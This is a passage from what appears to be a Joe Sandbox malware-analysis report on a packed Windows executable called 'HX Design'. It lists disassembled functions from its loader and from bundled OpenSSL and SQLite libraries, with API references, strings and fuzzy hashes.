00007FFDFADA4D31.LIBCRYPTO-3 ref: 00007FFE003532B6
00007FFDFADA4D31.LIBCRYPTO-3 ref: 00007FFE003532D7
00007FFDFADA4D31.LIBCRYPTO-3 ref: 00007FFE003532F8
00007FFDFADA4D31.LIBCRYPTO-3 ref: 00007FFE00353319
00007FFDFADA4D31.LIBCRYPTO-3 ref: 00007FFE00353336
00007FFDFADA4D31.LIBCRYPTO-3 ref: 00007FFE00353353
00007FFDFADA4D31.LIBCRYPTO-3 ref: 00007FFE00353370
00007FFDFADA4D31.LIBCRYPTO-3 ref: 00007FFE0035338D

Strings

ssl_srp_ctx_init_intern, xrefs: 00007FFE0035342D
..\s\ssl\tls_srp.c, xrefs: 00007FFE003533C3, 00007FFE00353402, 00007FFE00353436, 00007FFE00353454, 00007FFE0035346D

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\tls_srp.c$ssl_srp_ctx_init_intern
API String ID: 3568877910-1794268454
Opcode ID: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
Instruction ID: 390bbfc50e81a22eb88c541d2384e373be61e9fdc7dcfb553dc3bfda9aa9a1f5
Opcode Fuzzy Hash: 7c6f5f71629c738828d3fb28ae6d14af1525a41dda9b56dd32a690e7e5b3c519
Instruction Fuzzy Hash: B6915226A0AB8281FB86DB25D4507FC6360FF85B44F184635DB5C4B7BAEF2CE6958310

Function 00007FF732062180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7320621AB
SelectObject.GDI32 ref: 00007FF7320621F2
DrawTextW.USER32 ref: 00007FF732062215
SelectObject.GDI32 ref: 00007FF73206222B
ReleaseDC.USER32 ref: 00007FF73206223B
MoveWindow.USER32 ref: 00007FF73206228B
MoveWindow.USER32 ref: 00007FF7320622CB
MoveWindow.USER32 ref: 00007FF73206231E
MoveWindow.USER32 ref: 00007FF732062366

Strings

P%, xrefs: 00007FF7320621FF

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 0f3360b149681b7e4b9c729e51ed2cd11bf70a3dffbc8e03530394cc07474e5d
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: FA51E526604BA187D624AF26A4181BAB7A1F798B61F404131EBDE83695DF7CD089DB20

Function 00007FF7320680C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF7320680FF
GetWindowLongPtrW.USER32 ref: 00007FF73206817F
ShutdownBlockReasonCreate.USER32 ref: 00007FF732068192
GetLastError.KERNEL32 ref: 00007FF73206819C
SetWindowLongPtrW.USER32 ref: 00007FF7320681B3

Strings

Needs to remove its temporary files., xrefs: 00007FF732068185

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction ID: 8db2052b94fb66c2b72206f813024814f6b29c41213e9b733babec58ceb836df
Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction Fuzzy Hash: 0C21EC21B09A4292E7416B79F894179A250FF88B90FD84230DE2D873E5DE6CD54CD324

Function 00007FFDFACE2940 Relevance: 15.2, APIs: 10, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFDFACE2968
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFDFACE29BA
_RTC_Initialize.LIBCMT ref: 00007FFDFACE29E8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFDFACE2A0E
__scrt_release_startup_lock.LIBCMT ref: 00007FFDFACE2A39

Memory Dump Source

Source File: 00000001.00000002.2104253662.00007FFDFACE1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDFACE0000, based on PE: true

Associated: 00000001.00000002.2104206646.00007FFDFACE0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD2A000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD38000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD87000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD8C000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104253662.00007FFDFAD8F000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104600723.00007FFDFAD90000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000001.00000002.2104654670.00007FFDFAD92000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdface0000_HX Design.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
Instruction ID: ac138dfb6af36e37917bf408871fae4d50126f7f2736736dc0321be21fb89fda
Opcode Fuzzy Hash: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
Instruction Fuzzy Hash: D9819C29F1828786FF6C9B2598E1B7D6291AF85780F4880B5D96C573DEDE2CECC58700

Function 00007FF732076290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7320762D3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7320766C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF73207695C

Strings

-, xrefs: 00007FF732076369
:, xrefs: 00007FF73207648C
p, xrefs: 00007FF7320763FD
p, xrefs: 00007FF732076385
f, xrefs: 00007FF7320763F5

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 0cd1ac7d8c32175691ddce0a0ce6c4ed9b91edcd19bf4850116295a5c3236c0a
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: BD127061E0C283A6FB647A1CD1542BEF6A1FB50750FC44135E69B46AC4DFBCE588EB20

Function 00007FF732070FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF732071008
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7320713D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF73207166F

Strings

f, xrefs: 00007FF732071255
f, xrefs: 00007FF73207110A
p, xrefs: 00007FF732071112
f, xrefs: 00007FF7320710A0
p, xrefs: 00007FF7320710AD

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: ed78076f31f6aa2f294318ef55ec83903aa10f24e5db58e15f2d0d3763611756
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: B9129661E0C243A6FB247E18E054679F6A1FB80F54FD44035E69A47AC4DFBCE588EB60

Function 00007FFDFB342070 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 414COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB34210A

Strings

there is already an index named %s, xrefs: 00007FFDFB34231E
table, xrefs: 00007FFDFB3421A5
sqlite_temp_master, xrefs: 00007FFDFB3420C9, 00007FFDFB3421CD
sqlite_master, xrefs: 00007FFDFB34208F, 00007FFDFB3421F2, 00007FFDFB342544
%s %T already exists, xrefs: 00007FFDFB3422AD
view, xrefs: 00007FFDFB34219E, 00007FFDFB3422B4
temporary table name must be unqualified, xrefs: 00007FFDFB34213E

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 4225454184-2846519077
Opcode ID: 84d25b8da552c185cdb89ee5e2906974b5069851bad6cc199998fa191b9faedd
Instruction ID: 9209b9eca082a4334532132da81dc4e420f35ced02bdfcae5e7ea22b8c324939
Opcode Fuzzy Hash: 84d25b8da552c185cdb89ee5e2906974b5069851bad6cc199998fa191b9faedd
Instruction Fuzzy Hash: 7702BE62B1A68397EB14FB219820BA937E1FB85B88F005235CE6D177E9DF3DE5418700

Function 00007FFDFB2F0A30 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135COMMON

Download Yara Rule

APIs

new[].MSPDB140-MSVCRT ref: 00007FFDFB2F0B47

Strings

\, xrefs: 00007FFDFB2F0AB8
%s%c%s, xrefs: 00007FFDFB2F0AA6
?, xrefs: 00007FFDFB2F0A71
:, xrefs: 00007FFDFB2F0A9C
:, xrefs: 00007FFDFB2F0A61
winFullPathname2, xrefs: 00007FFDFB2F0BB5
winFullPathname1, xrefs: 00007FFDFB2F0B2C

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: new[]
String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
API String ID: 4059295235-3840279414
Opcode ID: 7514e8fd5d93be79fc71e0024bcf4f49aeb845a9e117b097cb897556365a7ddf
Instruction ID: 87b0afd167a4635567eb6968293f919ed13377caaee47d9eec4693968a8eaa9a
Opcode Fuzzy Hash: 7514e8fd5d93be79fc71e0024bcf4f49aeb845a9e117b097cb897556365a7ddf
Instruction Fuzzy Hash: B1519311F0E2C385FB159F629831EBA6B91AF44B88F484036DE6D876EECE3CE5458301

Function 00007FF732061050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

fread, xrefs: 00007FF7320611FD
Failed to extract %s: failed to open archive file!, xrefs: 00007FF732061098
fseek, xrefs: 00007FF7320610D3
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7320610CC
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF732061108
malloc, xrefs: 00007FF73206110F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7320611F6

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: ebfdd443e66c36c88ce938ee0def13dbb25be8a39f0dedabf99b0800e1494f32
Instruction ID: 214ca093491f94df52bd7333b87fe98486aa82ea463230b33745e3f7626d85cc
Opcode Fuzzy Hash: ebfdd443e66c36c88ce938ee0def13dbb25be8a39f0dedabf99b0800e1494f32
Instruction Fuzzy Hash: 1A41A221B08652A6EA10FB15E8046BAE391FF44FC4FC44432ED8C4B796DEBCE509E764

Function 00007FF732068660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF732063CBB), ref: 00007FF732068704
GetCurrentProcessId.KERNEL32(?,00000000,00007FF732063CBB), ref: 00007FF73206870A
CreateDirectoryW.KERNEL32(?,00000000,00007FF732063CBB), ref: 00007FF73206874C

Part of subcall function 00007FF732068830: GetEnvironmentVariableW.KERNEL32(00007FF73206388E), ref: 00007FF732068867
Part of subcall function 00007FF732068830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF732068889

Part of subcall function 00007FF732078238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF732078251

Part of subcall function 00007FF732062810: MessageBoxW.USER32 ref: 00007FF7320628EA

Strings

TMP, xrefs: 00007FF7320686C2
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF73206877E
LOADER: failed to set the TMP environment variable., xrefs: 00007FF7320686DC
TMP, xrefs: 00007FF73206869C, 00007FF7320687A3
_MEI%d, xrefs: 00007FF732068712

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
Instruction ID: d0dd66a154c182609d2c8bcf00ad31e4365669649a75384d994d52692b1424e4
Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
Instruction Fuzzy Hash: 1D41C611B19642A4FA10FB25B8952BAD291EF84BC0FC00131ED4D47BDAEEBCE50DE324

Function 00007FFDFB2F2CE0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 339COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB2F309A

Strings

8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB2F2D53, 00007FFDFB2F2EE9
API called with finalized prepared statement, xrefs: 00007FFDFB2F2E5C, 00007FFDFB2F2ED8
%s at line %d of [%.10s], xrefs: 00007FFDFB2F2E95, 00007FFDFB2F2F02
ATTACH x AS %Q, xrefs: 00007FFDFB2F2D70
misuse, xrefs: 00007FFDFB2F2E89, 00007FFDFB2F2EF6
API called with NULL prepared statement, xrefs: 00007FFDFB2F2E44

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
API String ID: 4225454184-1404302391
Opcode ID: 8ce0bce7dde3a7cc6d609d5fdf3d34c648de0cfc592bf91cd3842dd1b93a9340
Instruction ID: a402ad7ab2c7a6e73533319739228768064451d7a137627413ae2ee7dc4cae8d
Opcode Fuzzy Hash: 8ce0bce7dde3a7cc6d609d5fdf3d34c648de0cfc592bf91cd3842dd1b93a9340
Instruction Fuzzy Hash: 3BF15A21B0AA83C2EB64AB25A960B793BA5FF41B84F144135DE6D877F9CF3CE4458301

Function 00007FFDFB3643D0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 334COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB364559

Strings

CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text), xrefs: 00007FFDFB364474
table, xrefs: 00007FFDFB3643FA
sqlite_temp_master, xrefs: 00007FFDFB364415
sqlite_master, xrefs: 00007FFDFB36441C
ase, xrefs: 00007FFDFB36465D
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 00007FFDFB36474F

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
API String ID: 4225454184-879093740
Opcode ID: ca8b265791fa095afaf02c55fc6e7a2128b016b84bd851fd7879d418747ccf8a
Instruction ID: 1bcdfd5a4f1e219b99fd5b91f14ee4d899a4b7bc0f332760f75549d75633dd83
Opcode Fuzzy Hash: ca8b265791fa095afaf02c55fc6e7a2128b016b84bd851fd7879d418747ccf8a
Instruction Fuzzy Hash: C6E1D022F0A7939BEB15DB258560AB827E6FB55B88F064131CE2C577E9CF38E451C340

Function 00007FFE00327250 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 327COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE003273CA
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE003275E9
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE00327623

Strings

SECLEVEL=, xrefs: 00007FFE00327619
..\s\ssl\ssl_ciph.c, xrefs: 00007FFE00327667, 00007FFE003276E9
ssl_cipher_process_rulestr, xrefs: 00007FFE00327660, 00007FFE003276DD
STRENGTH, xrefs: 00007FFE003275DF

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: 00007B6570
String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
API String ID: 4069847057-331183818
Opcode ID: 3e8f7dbaccdc9d46899aacf333f9608422b89dcb9bc9042fe5e6119822def30e
Instruction ID: f2287e27fbedaf5def1050938dd7dac1d23cfc38087bcbb9f86d6b0deaf867c0
Opcode Fuzzy Hash: 3e8f7dbaccdc9d46899aacf333f9608422b89dcb9bc9042fe5e6119822def30e
Instruction Fuzzy Hash: 46D1B072A0C68286F762CF19A44037A67D1FBA5B80F145035EB8E977ECDE3CE8419B41

Function 00007FF73206EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF73206EA65

Part of subcall function 00007FF73206F9BC: __GetUnwindTryBlock.LIBCMT ref: 00007FF73206F9FF
Part of subcall function 00007FF73206F9BC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF73206FA24

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF73206EB3D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF73206ED8B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF73206EE98

Strings

csm, xrefs: 00007FF73206EB60
csm, xrefs: 00007FF73206EA7F
csm, xrefs: 00007FF73206EAE6

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction ID: 4fd0aca0971c72fa425bf99d301925014f6c8d49d116108ba1f4bead5319999a
Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
